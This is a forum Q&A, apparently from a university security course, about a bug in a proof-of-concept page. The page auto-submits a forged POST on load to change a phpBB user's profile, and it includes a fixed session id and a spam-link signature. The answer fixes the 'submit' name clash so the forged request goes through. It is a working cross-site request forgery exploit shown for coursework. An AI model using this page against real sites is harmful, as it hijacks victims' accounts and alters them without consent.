
如何解決 document.createElement('form').submit() 與 &submit=Submit 之間的衝突

下面的代碼創建一個POST請求,該請求的主體必須以 &submit=Submit 結尾。

不幸的是,這會與DOM表單對象產生衝突。

我無權訪問Web應用程序,因爲這是大學安全課程作業的一部分。我已經能夠通過代理手動編輯請求數據,把該參數添加到POST主體中,並且請求成功執行,但我希望能夠通過代碼自動完成此操作。

任何幫助將不勝感激。

<html> 
<body> 
<h1> 
This page sends a HTTP POST request onload. </h1> 
<script> 
/**
 * Builds a POST form from a string of <input> markup, attaches it to the
 * current page and submits it.
 *
 * @param {string} url - Value assigned to the form's action.
 * @param {string} fields - HTML markup assigned to the form's innerHTML.
 */
function post(url,fields) {
  var form = document.createElement('form');
  form.action = url;
  form.innerHTML = fields;
  form.method = 'post';
  form.target = '_self';
  // Attach the form to the current page before submitting it.
  document.body.appendChild(form);
  // Caveat: named controls are exposed as properties of the form element. If
  // `fields` contains a control named "submit", `form.submit` resolves to that
  // control instead of the built-in method, and this call throws a TypeError.
  form.submit();
}
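/**
 * Lab proof-of-concept: assembles the hidden inputs of a profile-edit request
 * (mode=editprofile) and passes them to post() for the hard-coded profile.php
 * URL.
 *
 * Every value below, including `sid` and `user_id`, is a constant fixed in
 * this page.
 * NOTE(review): nothing in the request is unpredictable per request; a
 * server-side anti-CSRF token check is the kind of control that would reject
 * it. What profile.php actually validates for `sid` is not visible here.
 */
function csrf_hack() {
  // Start from an empty string: with a bare `var fields;` the first `+=`
  // concatenates onto undefined and the markup begins with the text "undefined".
  var fields = "";
  // You should replace/augment the following lines with
  // your form parameters
  fields += "<input type='hidden' name='username' value='bob'>";
  fields += "<input type='hidden' name='email' value='[email protected]'>";
  fields += "<input type='hidden' name='cur_password' value=''>";
  fields += "<input type='hidden' name='new_password' value=''>";
  fields += "<input type='hidden' name='password_confirm' value=''>";
  fields += "<input type='hidden' name='icq' value=''>";
  fields += "<input type='hidden' name='aim' value=''>";
  fields += "<input type='hidden' name='msn' value='456'>";
  fields += "<input type='hidden' name='yim' value=''>";
  fields += "<input type='hidden' name='website' value=''>";
  fields += "<input type='hidden' name='location' value=''>";
  fields += "<input type='hidden' name='occupation' value=''>";
  fields += "<input type='hidden' name='interests' value='Hacking'>";
  fields += "<input type='hidden' name='signature' value='Free spicy sauce @ www.getyourfreespicysauce.com'>";
  fields += "<input type='hidden' name='viewemail' value='0'>";
  fields += "<input type='hidden' name='hideonline' value='0'>";
  fields += "<input type='hidden' name='notifyreply' value='0'>";
  fields += "<input type='hidden' name='notifypm' value='1'>";
  fields += "<input type='hidden' name='popup_pm' value='1'>";
  fields += "<input type='hidden' name='attachsig' value='1'>";
  fields += "<input type='hidden' name='allowbbcode' value='1'>";
  fields += "<input type='hidden' name='allowhtml' value='0'>";
  fields += "<input type='hidden' name='allowsmilies' value='1'>";
  fields += "<input type='hidden' name='language' value='english'>";
  fields += "<input type='hidden' name='style' value='1'>";
  fields += "<input type='hidden' name='timezone' value='0'>";
  fields += "<input type='hidden' name='dateformat' value='D M d, Y g:ia'>";
  fields += "<input type='hidden' name='mode' value='editprofile'>";
  fields += "<input type='hidden' name='agreed' value='true'>";
  fields += "<input type='hidden' name='coppa' value='0'>";
  fields += "<input type='hidden' name='sid' value='341942b39d0e2af257286aabd65b1e31'>";
  fields += "<input type='hidden' name='user_id' value='4'>";
  fields += "<input type='hidden' name='current_email' value='[email protected]'>";
  // This causes the form's submit() method to not be invoked: a control named
  // "submit" is exposed as the `submit` property of the form element that
  // post() builds, hiding the built-in method.
  fields += "<input type='hidden' name='submit' value='Submit'>";

  post('http://www.originalphpbb.com/profile.php',fields);
}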
// Run the proof-of-concept once the page has finished loading.
window.onload = function () {
  csrf_hack();
};
</script> 
</body></html> 

回答


在表單中創建一個 type="submit" 的 input,把整個表單追加到頁面,然後對這個 type="submit" 按鈕調用 .click()。這樣就不必調用已被名爲 submit 的字段遮蔽的 p.submit()。

/**
 * Builds a POST form from a string of <input> markup and submits it by
 * clicking a submit button appended to the form.
 *
 * @param {string} url - Value assigned to the form's action.
 * @param {string} fields - HTML markup assigned to the form's innerHTML.
 */
function post(url, fields) {
    var form = document.createElement('form');
    form.action = url;
    form.innerHTML = fields;
    form.method = 'post';
    form.target = '_self';
    // Add a real submit button. Submission is started through its click(), so
    // nothing depends on form.submit, which a field named "submit" would shadow.
    var button = document.createElement("input");
    button.type = "submit";
    form.appendChild(button);
    // Attach the form (with its button) to the page, then trigger the submission.
    document.body.appendChild(form);
    button.click();
}

演示概念:http://jsfiddle.net/9dMxC/1/


謝謝你。這完全解決了問題!我已經在報告中把你的回答列爲參考。 – SKR